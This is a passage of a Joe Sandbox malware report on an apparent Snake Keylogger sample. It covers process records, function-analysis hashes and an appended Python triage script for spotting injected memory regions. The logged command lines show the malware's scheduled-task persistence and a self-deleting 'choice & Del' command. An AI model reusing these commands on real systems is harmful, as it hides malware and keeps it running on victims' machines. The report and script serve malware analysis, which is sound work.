                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
                                          Imagebase:0x840000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:14:19:47
                                          Start date:02/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xe10000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:14
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:15
                                          Start time:14:19:53
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\choice.exe
                                          Wow64 process (32bit):true
                                          Commandline:choice /C Y /N /D Y /T 3
                                          Imagebase:0x350000
                                          File size:28'160 bytes
                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:14:19:58
                                          Start date:02/01/2025
                                          Path:C:\Windows\SysWOW64\choice.exe
                                          Wow64 process (32bit):true
                                          Commandline:choice /C Y /N /D Y /T 3
                                          Imagebase:0x350000
                                          File size:28'160 bytes
                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:12.7%
                                            Dynamic/Decrypted Code Coverage:99.1%
                                            Signature Coverage:3.9%
                                            Total number of Nodes:333
                                            Total number of Limit Nodes:21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4|hq$4|hq$$cq
                                            • API String ID: 0-1037649440
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq$LRcq$$cq$$cq$$cq$$cq$$cq$$cq
                                            • API String ID: 0-765342939

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 9941cd0, calls 99426e0.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq$Hgq$Hgq$Hgq$Hgq$lqM
                                            • API String ID: 0-959112734
                                            • Opcode ID: 4218517390a48f5c52e0d0197d0675c4f0d2babff357dafd6542318d3203c1d6
                                            • Instruction ID: 62a7bff2dfdef21c23df0b3cb90b82504e58f42b94842210588104ab622f8164
                                            • Opcode Fuzzy Hash: 4218517390a48f5c52e0d0197d0675c4f0d2babff357dafd6542318d3203c1d6
                                            • Instruction Fuzzy Hash: 06425D70E002188FDB55DFA9C850BAEBBF6BF88300F14856AE449AB395DB349D85CF51

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 28e8379, calls 28e0754, 28e98cf, 28e9908.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,GH_$,GH_$4_$4_$pn$n
                                            • API String ID: 0-3969063491
                                            • Opcode ID: 133a47d33855acdd55a8b0c82ae808bc118239864d88b13bbf24171fbae77619
                                            • Instruction ID: b05c2787408023d7dec5fbbc001f6aa56f8711750422f56e5f7fe51727170c7b
                                            • Opcode Fuzzy Hash: 133a47d33855acdd55a8b0c82ae808bc118239864d88b13bbf24171fbae77619
                                            • Instruction Fuzzy Hash: A081F4B8E00209DFDB44CFA5D58459EBBB2BF89304F20986AD41ABB2A4DB355941CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$,gq$,gq$Hgq
                                            • API String ID: 0-1029698136
                                            • Opcode ID: d10adeaf68f056888c3b05042fd48028fdc3d3f96b99c6930f2a582e185730ee
                                            • Instruction ID: 406cc9c86c1421cad20292a9e11496fb65d99b451d65b37b51be18462a439b05
                                            • Opcode Fuzzy Hash: d10adeaf68f056888c3b05042fd48028fdc3d3f96b99c6930f2a582e185730ee
                                            • Instruction Fuzzy Hash: 0A526E35B101199FCB58DFA9C484AAEBBF2FF98350F158169E8069B361DB35EC41CB90

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 998c390, calls 99840dc, 99840ec, 998bf7c, 998bf8c, 998bf9c, 998bfac, 998bfbc, 998bfcc, 998bfdc, 998bfec, 9983f58, 998c100, 998c110.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: plM$|lM$|lM
                                            • API String ID: 0-3351539482
                                            • Opcode ID: 9783646c6d82ebc03c45ffed26b8a168e432a5b7457e31d57fd27cd371be76ab
                                            • Instruction ID: 2cd563be137e8564c10b2932e9d299ff3440d7a1c9504b000768c46c32aa8738
                                            • Opcode Fuzzy Hash: 9783646c6d82ebc03c45ffed26b8a168e432a5b7457e31d57fd27cd371be76ab
                                            • Instruction Fuzzy Hash: CEE18A75B016048FDB15EF69D460BAFB7EAAFC9700F14846DE1859B290DB35E801CBA1

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 28e34ed, calls 28e3c0a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -2>$;U9o$U[\
                                            • API String ID: 0-2120899229
                                            • Opcode ID: c66da377135ddb586a5ff25e354c51c488d2ed680c49b507b90bce8e4a6f8d10
                                            • Instruction ID: 82f912111f29be7fd391ce72bdef8cbc7e892463a76021fc1fc165ecdd8647bc
                                            • Opcode Fuzzy Hash: c66da377135ddb586a5ff25e354c51c488d2ed680c49b507b90bce8e4a6f8d10
                                            • Instruction Fuzzy Hash: 58F15CB8D0560ACFCF14CFA9C4818AEFBB2FF8A304B149599C456AB365D7359942CF90

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 28e35a8, calls 28e3c0a.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -2>$;U9o$U[\
                                            • API String ID: 0-2120899229
                                            • Opcode ID: 112a88ec9529a701b414fcc0f478273a048824bd854978e684c23e0227f8241a
                                            • Instruction ID: 2243c0cbf5229c40cb434b4010209eb9bb347686c0cf86ed26515c90df4eb219
                                            • Opcode Fuzzy Hash: 112a88ec9529a701b414fcc0f478273a048824bd854978e684c23e0227f8241a
                                            • Instruction Fuzzy Hash: B0D109B8D0520ADFCF04CFA6C5818AEFBB2FF8A304B149595D416AB365D7349942CF94

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 28e1332, calls 28e00e4, 28e00f4, 28e1c60, 28e27ef, 28e28da, 28e280b, 28e2698, 28e2829, 28e3286, 28e2784, 28e3213.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq$Tecq$hM
                                            • API String ID: 0-2073652005
                                            • Opcode ID: 665e72ccbd3dd38c91daad98fc6457dc1367bdf2cc6af6f2e30c7c166bd7c364
                                            • Instruction ID: 5f68eaa7967759cc1eb0b8e4c10e293489afe17f2e6a3cbeed46fcd1d3d741ed
                                            • Opcode Fuzzy Hash: 665e72ccbd3dd38c91daad98fc6457dc1367bdf2cc6af6f2e30c7c166bd7c364
                                            • Instruction Fuzzy Hash: BDB15974E046498FDB04CFA9C884ADDFBF2FF8A310F14856AD859AB365E7319941CB50

                                            Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed): entry block 28e13d0, calls 28e00e4, 28e00f4, 28e1c60, 28e27ef, 28e28da, 28e280b, 28e2698, 28e2829, 28e3286, 28e2784, 28e3213.
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq$Tecq$hM
                                            • API String ID: 0-2073652005
                                            • Opcode ID: ea63495aae160d25e1d145ae1dc3d562bbf3357069d369102d062b99bef65173
                                            • Instruction ID: fe2dca01be1bca2fd51f72d16d313a6d2ee1950762fe21fa111fd181a71ac957
                                            • Opcode Fuzzy Hash: ea63495aae160d25e1d145ae1dc3d562bbf3357069d369102d062b99bef65173
                                            • Instruction Fuzzy Hash: DD81E7B4E002199FCB08CFE9D884A9EFBB2FF89314F10952AD51ABB364D7349945CB54
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: $H
                                            • API String ID: 1778838933-3639665872
                                            • Opcode ID: 0f39b7184350f4efac7959d12160c73a8390c24355dc9f4a46419b43129798f4
                                            • Instruction ID: 54a113bd809076b1b9c9eccb4dabbcf114b8c4b543db89e61a192af8d552a6de
                                            • Opcode Fuzzy Hash: 0f39b7184350f4efac7959d12160c73a8390c24355dc9f4a46419b43129798f4
                                            • Instruction Fuzzy Hash: 534174B9D04258DFCF10CFA9D980A9EFBF5BB19310F10A02AE819B7210D375A945CF64
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: 7598905bfc53cee44cbc466c2938ebbc0c8a432b4b15a8888d0c2a1891408e53
                                            • Instruction ID: 3b5a529e16b8ea2205b13a68eed89584374766ad0033f0eaf13adcb11540b80e
                                            • Opcode Fuzzy Hash: 7598905bfc53cee44cbc466c2938ebbc0c8a432b4b15a8888d0c2a1891408e53
                                            • Instruction Fuzzy Hash: 194175B9D04258DFCF10CFA9D984ADEFBB5BB19310F14A02AE828B7250D375A945CF64
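The two entries above are the only ones in this stretch of the function analysis that resolve an API call: NtQueryInformationProcess.NTDLL at 028E9C25, inside the 028E0000 region whose dump name carries protection 00000040 (PAGE_EXECUTE_READWRITE) and type 00020000 (MEM_PRIVATE) and which the IDA plugin reports as not PE-backed. Private, writable, executable memory that is not an image mapping is where unpacked or injected code lives, and NtQueryInformationProcess is both the usual way a RunPE-style loader locates a suspended child's PEB (ProcessBasicInformation) and a common anti-debug probe (ProcessDebugPort). The report does not show the information class, so which of the two applies here must be confirmed in the dump. The script below is an added triage helper, not part of the Joe Sandbox report or of the sample's code: it parses entries in the format shown on this page, decodes the protection and type fields from the dump file name, and groups functions by region with the flags a reviewer would want. The field layout of the .sdmp name (pid.dumpid.sequence.base.protect.field6.type.field8) is an assumption inferred from the names on this page; only the Windows memory constants themselves are standard. The sample text embedded in the script is copied from the entries above.

```python
"""Triage helper for Joe Sandbox function-analysis entries (added example, not report output)."""
import re
from collections import defaultdict

# Memory constants from winnt.h
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
PAGE_READWRITE, PAGE_WRITECOPY = 0x04, 0x08
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumption: the .sdmp name is <pid>.<dumpid>.<sequence>.<base>.<protect>.<field6>.<type>.<field8>,
# with <protect> and <type> holding MEMORY_BASIC_INFORMATION values. Inferred from names on this page.
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp.*?based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)
# Resolved API lines look like: "• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25"
API_RE = re.compile(r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\(.*?\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
OPCODE_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")

# APIs whose presence in unbacked executable memory deserves a second look (hollowing / anti-debug).
INTROSPECTION_APIS = {"NtQueryInformationProcess", "NtUnmapViewOfSection", "NtSetContextThread", "NtResumeThread"}


def parse_entries(report_text):
    """Split the function-analysis text into one record per function (terminated by its fuzzy hash)."""
    entries, cur = [], {"apis": []}
    for line in report_text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append((m["name"], m["module"], int(m["ref"], 16)))
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.update(base=int(m["base"], 16), protect=int(m["protect"], 16),
                       mtype=int(m["mtype"], 16), pe_backed=m["pe"].lower() == "true")
            continue
        m = OPCODE_RE.search(line)
        if m:
            cur["opcode_id"] = m["id"]
            continue
        if "Instruction Fuzzy Hash:" in line:  # last field of an entry
            if "base" in cur:
                entries.append(cur)
            cur = {"apis": []}
    return entries


def flags_for(entry):
    """Flags a reviewer cares about: unbacked W+X memory, private executable memory, introspection APIs."""
    flags, p = [], entry["protect"]
    if (p & EXEC_MASK) and (p & WRITE_MASK) and not entry["pe_backed"]:
        flags.append("unbacked-writable-executable")
    if entry["mtype"] == 0x20000 and (p & EXEC_MASK):
        flags.append("private-executable")
    if any(name in INTROSPECTION_APIS for name, _, _ in entry["apis"]):
        flags.append("process-introspection-api")
    return flags


def summarize_regions(entries):
    """Group functions by region base: function count, resolved APIs, flags, protection and type."""
    regions = defaultdict(lambda: {"functions": 0, "apis": set(), "flags": set(), "protect": None, "type": None})
    for e in entries:
        r = regions[e["base"]]
        r["functions"] += 1
        r["apis"].update(name for name, _, _ in e["apis"])
        r["flags"].update(flags_for(e))
        r["protect"], r["type"] = e["protect"], MEM_TYPES.get(e["mtype"], hex(e["mtype"]))
    return dict(regions)


# Constructed sample: two entries copied from this report page (028E0000 and 09940000 regions).
SAMPLE = """\
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25
Memory Dump Source
• Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
• Opcode ID: 7598905bfc53cee44cbc466c2938ebbc0c8a432b4b15a8888d0c2a1891408e53
• Instruction Fuzzy Hash: 194175B9D04258DFCF10CFA9D984ADEFBB5BB19310F14A02AE828B7250D375A945CF64
Memory Dump Source
• Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
• Opcode ID: 6e88212a0680bac6099c8730c8e6b6d54db9fdf47dc816c9ca2dabea130f4f3d
• Instruction Fuzzy Hash: 10C16C71E002198FDB25CFA5D880B9DBBF2BF88310F14C5AAE459AB255DB30D985CF50
"""

if __name__ == "__main__":
    for base, r in sorted(summarize_regions(parse_entries(SAMPLE)).items()):
        print(f"{base:#010x} protect={r['protect']:#x} {r['type']} functions={r['functions']} "
              f"apis={sorted(r['apis'])} flags={sorted(r['flags'])}")
```

Run it against the whole function-analysis section rather than the embedded sample to see which regions concentrate the resolved API calls; a region that is private, W+X, not PE-backed and holds the NtQueryInformationProcess caller is the one to dump and disassemble first.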
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: lqM
                                            • API String ID: 0-965483564
                                            • Opcode ID: 6e88212a0680bac6099c8730c8e6b6d54db9fdf47dc816c9ca2dabea130f4f3d
                                            • Instruction ID: 8a690fefb72c8c07c16f75ce96d84f47a82a5bd5e96584f7f2d3427ffb8993c1
                                            • Opcode Fuzzy Hash: 6e88212a0680bac6099c8730c8e6b6d54db9fdf47dc816c9ca2dabea130f4f3d
                                            • Instruction Fuzzy Hash: 10C16C71E002198FDB25CFA5D880B9DBBF2BF88310F14C5AAE459AB255DB30D985CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: U't;
                                            • API String ID: 0-449652031
                                            • Opcode ID: 5a5b04db8158a8054dc575b6e755e44d08ea9d0fbbe6f1a8bede28e8916240d7
                                            • Instruction ID: 3abf1126897087c5c09fecef424a341d8d232379715591c6f8dcefd8426a04eb
                                            • Opcode Fuzzy Hash: 5a5b04db8158a8054dc575b6e755e44d08ea9d0fbbe6f1a8bede28e8916240d7
                                            • Instruction Fuzzy Hash: 21A11778D0921DCFDF18DFA8D98069DBBB2BF8A704F24852AD406BB254DB349981CF15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: at{
                                            • API String ID: 0-3707570843
                                            • Opcode ID: 5c9c28b82ab277629a49af85c451249418577a83c3189cae51bffa9d43bac201
                                            • Instruction ID: e73f3c8a2ba12b597a258db5b48e3e6d6f9090c462c0aae3665fd9a3637d40eb
                                            • Opcode Fuzzy Hash: 5c9c28b82ab277629a49af85c451249418577a83c3189cae51bffa9d43bac201
                                            • Instruction Fuzzy Hash: 395119B8E042099FDF08CFAAC9445AEFBF2EF89310F24D56AD41AE7254D3349941CB65
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: B^
                                            • API String ID: 0-1816219012
                                            • Opcode ID: 05e603ca5e3b813deff87a42a16b0ca11c6dd7885c0ab4c6fe55904d4b599056
                                            • Instruction ID: e19fd604ed6f0d9126d3a1ed2451e6c60e6d6fa32b5d6548a2bf3284a8ecbe51
                                            • Opcode Fuzzy Hash: 05e603ca5e3b813deff87a42a16b0ca11c6dd7885c0ab4c6fe55904d4b599056
                                            • Instruction Fuzzy Hash: 14419AB4D01248DFDB10CFE9C984A9EFBF1AB09300F24942AE814BB250D775A989CF58
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: B^
                                            • API String ID: 0-1816219012
                                            • Opcode ID: 24b35b5f17b8ead3eb1ab140825bfbe0b2b4288954084b0a2dcbf12e5366e03c
                                            • Instruction ID: 232936fb1667c23ee7b9bf397ff2db6f4cc70c9a7ab6220c881f6ada69a45273
                                            • Opcode Fuzzy Hash: 24b35b5f17b8ead3eb1ab140825bfbe0b2b4288954084b0a2dcbf12e5366e03c
                                            • Instruction Fuzzy Hash: DB419AB4D01208DFDB20CFE9C984A9EFBF0EB19300F24942AE914BB250D775A948CF58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be1274d0f4fa25bda18b10efcc33dfece44ea9c06aecb74cc8fa076da1f58090
                                            • Instruction ID: 162f45964cc738569a7c3e6af291cc5b716524818d724daa973dcb68c80396dd
                                            • Opcode Fuzzy Hash: be1274d0f4fa25bda18b10efcc33dfece44ea9c06aecb74cc8fa076da1f58090
                                            • Instruction Fuzzy Hash: 68312BB5E052588FDB18CFA6D8446DEBBB2EFC9310F14C1AAD409AB264DB754949CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b429598acd276c6a536024a98d0085b9285e46f6139518002f44db77cc4744f2
                                            • Instruction ID: 158f59e43ee5866fc497905908999c597e6cf5231189f45c76ac1b912b61232d
                                            • Opcode Fuzzy Hash: b429598acd276c6a536024a98d0085b9285e46f6139518002f44db77cc4744f2
                                            • Instruction Fuzzy Hash: 89210A75E046188BEB18CF6BDC4079EBAF3BFC9200F04C5BAC51DA6264EB3409458F51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d88ae22f25c73613921d1e12c6febd4e044b5d37038497e86a7f26bf16c36c17
                                            • Instruction ID: 69fa7afc6d71e118c623f2a41801f7449b567dbc91f0c1c230b45034e357db40
                                            • Opcode Fuzzy Hash: d88ae22f25c73613921d1e12c6febd4e044b5d37038497e86a7f26bf16c36c17
                                            • Instruction Fuzzy Hash: E3A00245C8F0048080403C1100941B7C03D165B694E447C4E901A3740A0405C080003C

                                            Control-flow Graph (legend: Executed / Not Executed)
                                            control_flow_graph 1851 29a79c8-29a7a67 GetCurrentProcess 1855 29a7a69-29a7a6f 1851->1855 1856 29a7a70-29a7aa4 GetCurrentThread 1851->1856 1855->1856 1857 29a7aad-29a7ae1 GetCurrentProcess 1856->1857 1858 29a7aa6-29a7aac 1856->1858 1860 29a7aea-29a7b05 call 29a7ba7 1857->1860 1861 29a7ae3-29a7ae9 1857->1861 1858->1857 1864 29a7b0b-29a7b3a GetCurrentThreadId 1860->1864 1861->1860 1865 29a7b3c-29a7b42 1864->1865 1866 29a7b43-29a7ba5 1864->1866 1865->1866
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 029A7A56
                                            • GetCurrentThread.KERNEL32 ref: 029A7A93
                                            • GetCurrentProcess.KERNEL32 ref: 029A7AD0
                                            • GetCurrentThreadId.KERNEL32 ref: 029A7B29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: cd9d9628e1e965053d06cfd8eafe8b728496d1c182bd98f1ab478400f150f8d6
                                            • Instruction ID: 0f807a23f1dcc8c17d4cb0b63d8306d2fe188a8244c0ca363e83feebcc2a06d5
                                            • Opcode Fuzzy Hash: cd9d9628e1e965053d06cfd8eafe8b728496d1c182bd98f1ab478400f150f8d6
